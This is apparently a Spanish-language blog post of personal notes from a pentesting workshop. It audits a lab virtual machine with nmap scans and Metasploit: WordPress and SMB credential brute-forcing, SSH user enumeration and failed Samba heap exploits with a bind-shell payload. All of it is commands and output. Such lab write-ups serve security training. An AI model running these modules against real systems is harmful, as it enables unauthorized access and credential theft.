Pentesting: pruebas metaexploit
Apuntes Repaso de lo aprendido en el taller de ‘#Pentesting4ever’ impartido en el congreso de Seguridad informatica #Euskalhack.
Repaso de lo aprendido en el taller de ‘#Pentesting4ever’
impartido en el congreso de Seguridad informatica #Euskalhack.
1) Arranco la maquina a auditar illidian en virtualbox
Nota: le configuro la red como adaptador solo anfitrion.
La red de mis VM es 192.168.56.XX(este dato puede ser diferente en tu equipo (ip a |grep global))
Luego hago un nmap -sn 192.168.56.0/24 o nmap -sn 192.168.56.* a ver que sale:
em50l@jejo.es:~$ nmap -sn 192.168.56.* Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-30 12:35 CEST Nmap scan report for medion (192.168.56.1) Host is up (0.00040s latency). Nmap scan report for 192.168.56.103 Host is up (0.00056s latency). Nmap done: 256 IP addresses (2 hosts up) scanned in 2.32 seconds em50l@jejo.es$
bien. La ip es la 192.168.56.103
Aunque no es necesario (no es bueno hacer mucho ruido) voy a ver los puertos:
nmap 192.168.56.103 -p 1-1024
Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-23 12:48 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00051s latency).
Not shown: 1015 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
Nmap done: 1 IP address (1 host up) scanned in 0.12 secondscomo nota al primer escaner veo ftp ,http correo y mircrosoft smb
Pruebas con metaexploit
La mejor manera es arrancar la consola metaexploit msfconsole
root@kali:~# msfconsole
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
Es una interfax tipo REPL se puede usar tabular para mostrar los comandos.
tecleo use aux <tab> sca <tab> ht <tab> w <tab> para ver todos los plugins de wordpress.
msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >
Tecleo sh <tab> act <tab>
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show actions Auxiliary actions: Name Description msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >
Tecleo show options
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show options Module options (auxiliary/scanner/http/wordpress_xmlrpc_login): Name Current Setting Required Description BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI / yes The base path to the wordpress application THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >
Configuro el plugin
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set targeturi / targeturi => / msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set rhosts 192.168.56.103 rhosts => 192.168.56.103 msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run [*] 192.168.56.103:80 :/xmlrpc.php - Sending Hello... [+] 192.168.56.103:80 - XMLRPC enabled, Hello message received! [*] Starting XML-RPC login sweep... [*] Error: 192.168.56.103: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::WordpressRPC) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >
Parece que por fin consigo algo.
Truco tambien puedes lanzar nmap desde metaexploit
(pero por mi experiencia va mas lento )
msf5 > nmap 192.168.56.103 -p 1-1024 [*] exec: nmap 192.168.56.103 -p 1-1024 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 09:13 EDT Nmap scan report for 192.168.56.103 (192.168.56.103) Host is up (0.0011s latency). Not shown: 1015 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 993/tcp open imaps 995/tcp open pop3s Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds msf5 >
Escaneo detallado nmap -Pn -sS -A 192.168.56.103
msf5 > nmap -Pn -sS -A 192.168.56.103 [*] exec: nmap -Pn -sS -A 192.168.56.103 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 09:14 EDT Nmap scan report for 192.168.56.103 (192.168.56.103) Host is up (0.0017s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | | FTP server status: vsFTPd 2.3.5 - secure, fast, stable 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-generator: WordPress 4.6.6 |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Everybody want to be a chef | Just another WordPress site 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) 993/tcp open ssl/imaps? 995/tcp open ssl/pop3s? Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: ILLIDAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.6.3) | Computer name: illidan | FQDN: illidan |_ System time: 2019-07-06T15:15:12+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Nmap done: 1 IP address (1 host up) scanned in 160.83 seconds
escaneo TCP idle scan, stealthily by spoofing the IP address .
msf5 > use auxiliary/scanner/ip/ipidseq msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.56.64/26 rhosts => 192.168.56.64/26 msf5 auxiliary(scanner/ip/ipidseq) > run [*] 192.168.56.101's IPID sequence class: Incremental! [*] 192.168.56.103's IPID sequence class: Incremental! [*] Auxiliary module execution completed msf5 auxiliary(scanner/ip/ipidseq) > msf5 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.56.101 192.168.56.103 6/tcp open unknown ...... 20/tcp open ftp-data 21/tcp closed|filtered ftp 22/tcp closed|filtered ssh 23/tcp open telnet ..... 79/tcp open finger 80/tcp closed|filtered http ..... 109/tcp open pop2 110/tcp closed|filtered pop3 111/tcp open rpcbind 113/tcp open ident 119/tcp open nntp 125/tcp open locus-map 135/tcp open msrpc 139/tcp closed|filtered netbios-ssn 143/tcp closed|filtered imap 144/tcp open news ..... 444/tcp open snpp 445/tcp closed|filtered microsoft-ds 458/tcp open appleqtc ...... 992/tcp open telnets 993/tcp closed|filtered imaps 995/tcp closed|filtered pop3s 999/tcp open garcon .....La ventaja de este escaneo es que no de detecta la ip origen. si hago un tcpdump no veo la ip de la maquina que escanea.
root@illidan:~# tcpdump -n 16:39:21 IP 192.168.56.1.45596 > 192.168.56.103.23: Flags [S], seq 91, win 29200, opt [mss 1460,sackOK,TS val 1432 ecr 0,nop,wscale7],l0 16:39:21 IP 192.168.56.103.23 > 192.168.56.1.45596: Flags [R.], seq 0, ack 92, win 0, length 0 16:39:22 IP 192.168.56.1.45598 > 192.168.56.103.23: Flags [S], seq 60, win 29200, opt [mss 1460,sackOK,TS val 1446 ecr 0,nop,wscale7],l0 16:39:22 IP 192.168.56.103.23 > 192.168.56.1.45598: Flags [R.], seq 0, ack 61, win 0, length 0 16:39:22 IP 192.168.56.1.45600 > 192.168.56.103.23: Flags [S], seq 51, win 29200, opt [mss 1460,sackOK,TS val 1472 ecr 0,nop,wscale7],l0
Port Scanning with Metasploit
use scanner/portscan/syn
set RHOSTS 192.168.56.103
run
msf5 > use scanner/portscan/syn msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.56.103 RHOSTS => 192.168.56.103 msf5 auxiliary(scanner/portscan/syn) > run [+] TCP OPEN 192.168.56.103:21 [+] TCP OPEN 192.168.56.103:22 [+] TCP OPEN 192.168.56.103:80 [+] TCP OPEN 192.168.56.103:110 [+] TCP OPEN 192.168.56.103:139 [+] TCP OPEN 192.168.56.103:143Para mi gusto un poco lento. #### Targeted Scanning with Metasploit `use scanner/smb/smb_version` `set RHOSTS 192.168.56.103` `run` #### SSH Server Scanning `use scanner/smb/smb_version` `set RHOSTS 192.168.56.103` `run`
msf5 > msf5 > use scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.56.103 RHOSTS => 192.168.56.103 msf5 auxiliary(scanner/ssh/ssh_version) > run [+] 192.168.56.103:22 - SSH server version: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4 ( service.version=5.9p1 openssh.comment=Debian-5ubuntu1.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=12.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:12.04 service.protocol=ssh fingerprint_db=ssh.banner ) [*] 192.168.56.103:22 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_version) >
Validating SMB Logins
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.56.1/24
set SMBUser Administrator
set SMBPass s3cr3t
run
intentaria validarse en todos los ordenadores de la red.
msf5 > msf5 > use auxiliary/scanner/smb/smb_login msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.56.64/26 RHOSTS => 192.168.56.64/26 msf5 auxiliary(scanner/smb/smb_login) > set SMBUser Administrator SMBUser => Administrator msf5 auxiliary(scanner/smb/smb_login) > set SMBPass eUSk4l_99% SMBPass => eUSk4l_99% msf5 auxiliary(scanner/smb/smb_login) > run [*] 192.168.56.102:445 - 192.168.56.102:445 - Starting SMB login bruteforce [-] 192.168.56.102:445 - 192.168.56.102:445 - Could not connect [!] 192.168.56.102:445 - No active DB -- Credential data will not be saved! [*] 192.168.56.103:445 - 192.168.56.103:445 - Starting SMB login bruteforce [+] 192.168.56.103:445 - 192.168.56.103:445 - Success: '.\Administrator:eUSk4l_99%'Como se ve se ha validado en el 103. (otra vul encontrada) #### Busqueda VNC sin identificacion `use auxiliary/scanner/vnc/vnc_none_auth` `set RHOSTS 192.168.56.1/24` `run` Buscaria VNC sin contraseña en todos los ordenadores de la red. ___ ____ ___ ## Explotando una maquina ubuntu `nmap -sT -A -P0 192.168.56.103` #### pruebo con smb
msf5 > use linux/samba/lsa_transnames_heap msf5 exploit(linux/samba/lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp payload => linux/x86/shell_bind_tcp msf5 exploit(linux/samba/lsa_transnames_heap) > set LPORT 8080 LPORT => 8080 msf5 exploit(linux/samba/lsa_transnames_heap) > set RHOSTS 192.168.56.103 RHOSTS => 192.168.56.103 msf5 exploit(linux/samba/lsa_transnames_heap) > exploit [*] 192.168.56.103:445 - Creating nop sled.... [*] Started bind TCP handler against 192.168.56.103:8080 [*] 192.168.56.103:445 - Trying to exploit Samba with address 0xffffe410... [*] 192.168.56.103:445 - Connecting to the SMB service... [-] 192.168.56.103:445 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.6.3) [*] Exploit completed, but no session was created. msf5 exploit(linux/samba/lsa_transnames_heap) >Huy que pena ;-( Busco un poco mas `Samba 3.6.3 vuln exploitmeta` https://www.cvedetails.com/version/124670/Samba-Samba-3.6.3.html voy a Related Metasploit Modules https://www.cvedetails.com/metasploit-modules/version-124670/Samba-Samba-3.6.3.html hay 3 modulos. pruebo...
msf5 > msf5 > use exploit/linux/samba/setinfopolicy_heap msf5 exploit(linux/samba/setinfopolicy_heap) > set payload linux/x86/shell_bind_tcp payload => linux/x86/shell_bind_tcp msf5 exploit(linux/samba/setinfopolicy_heap) > set RHOSTS 192.168.56.103 RHOSTS => 192.168.56.103 msf5 exploit(linux/samba/setinfopolicy_heap) > exploit [*] 192.168.56.103:445 - Trying to exploit Samba with address 0xb67f1000... [*] Started bind TCP handler against 192.168.56.103:8080 [-] 192.168.56.103:445 - Server is most likely patched...Huy que pena ;-( #### pruebo con SSH la maquina tiene openssh luego busco modulos `search OpenSSH`
msf5 > search OpenSSH Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration 2 exploit/windows/local/trusted_service_path 2001-10-25 excellent Yes Windows Service Trusted Path Privilege Escalation 3 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection 4 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant msf5 >
msf5 > msf5 > use auxiliary/scanner/ssh/ssh_enumusers msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.56.103 RHOSTS => 192.168.56.103 msf5 auxiliary(scanner/ssh/ssh_enumusers) > set username root username => root msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [*] 192.168.56.103:22 - SSH - Using malformed packet technique [*] 192.168.56.103:22 - SSH - Starting scan [+] 192.168.56.103:22 - SSH - User 'root' found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_enumusers) >
Nada….
pruebo con http
https://www.cvedetails.com/version/142323/Apache-Http-Server-2.2.22.html
Nada…
pruebo con wordpress
msf5 > use auxiliary/scanner/http/wordpress_login_enum msf5 auxiliary(scanner/http/wordpress_login_enum) > run [*] / - WordPress Version 4.6.6 detected [*] 192.168.56.103:80 - / - WordPress User-Enumeration - Running User Enumeration [*] 192.168.56.103:80 - / - WordPress User-Validation - Running User Validation [*] / - WordPress User-Validation - Checking Username:'sean' [+] / - WordPress User-Validation - Username: 'sean' - is VALID [+] / - WordPress User-Validation - Found 1 valid user [*] 192.168.56.103:80 - [2/1] - / - WordPress Brute Force - Running Bruteforce [*] 192.168.56.103:80 - [2/1] - / - WordPress Brute Force - Skipping all but 1 valid user [*] 192.168.56.103:80 - [1/1] - / - WordPress Brute Force - Trying username:'sean' with password:'eUSk4l_99%' [-] 192.168.56.103:80 - [1/1] - / - WordPress Brute Force - Failed to login as 'sean' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/http/wordpress_login_enum) >